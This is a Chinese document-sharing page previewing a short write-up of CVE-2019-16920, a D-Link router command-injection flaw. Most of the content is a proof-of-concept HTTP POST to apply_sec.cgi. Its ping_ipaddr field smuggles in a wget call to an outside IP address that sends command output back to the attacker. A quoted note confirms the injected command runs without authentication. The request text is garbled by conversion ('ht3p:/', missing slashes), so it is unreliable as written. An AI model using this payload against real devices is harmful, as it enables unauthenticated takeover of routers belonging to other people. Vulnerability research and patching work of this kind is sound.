(CVE-2019-16920)D-Link rce.docx

上传人:p** 文档编号:493965 上传时间:2023-09-19 格式:DOCX 页数:1 大小:6.81KB
下载 相关 举报
(CVE-2019-16920)D-Link rce.docx_第1页
第1页 / 共1页
亲,该文档总共1页,全部预览完了,如果喜欢就下载吧!
资源描述

《(CVE-2019-16920)D-Link rce.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-16920)D-Link rce.docx(1页珍藏版)》请在第壹文秘上搜索。

1、(CVE-2019-16920) D-Link rce一、漏洞简介D-Link设备中出现未经身份验证的命令注入漏洞(FG-VD-19-117CVE2019 16920),该漏洞可造成远程代码执行。二、漏洞影响DIR-655 , DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, DIR-825 等三、复现过程poc攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命 令注入。POST /apply_sec.cgi HTTP/1.1Host: 192.168.232.128

2、User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Geck o20100101 Firefox/69.0Accept: texthtml,applicationxhtml+xmljapplicationxmljq=0.9,*jq=0.8 Accept-Language: vi-VN,vijq=0.8,en-US;q=0.5,enjq=0.3Accept-Encoding: gzip, deflateContent-Type: application/X-WWW-form-urIencodedContent-Le

3、ngth: 131Connection: closeReferer: http:/192.168.232.128/login_pic. aspCookie: uid=1234123Upgrade-Insecure-Requests: 1html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1% 0awgt%20-P%25tmp%20ht3p:/45.76.148.31:4321/?$(echo1234)“该漏洞始于一次错误的身份验证过程。当我们要进入管理页面时,需要执行登录 操作。此时,我们会对apply_sec.cgi页面发出POST请求,其中包含一个操作 ping_testo研究后发现,我们可通过参数Ping_ipaddr执行命令注入。虽然响应 是返向登录页面,但操作PingleSt仍然执行了,我们通过参数ping_ipaddr注 入的命令echo 1234成功执行,并将结果发送回我们的服务器。”image

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > IT计算机 > 服务器

copyright@ 2008-2023 1wenmi网站版权所有

经营许可证编号:宁ICP备2022001189号-1

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。第壹文秘仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第壹文秘网,我们立即给予删除!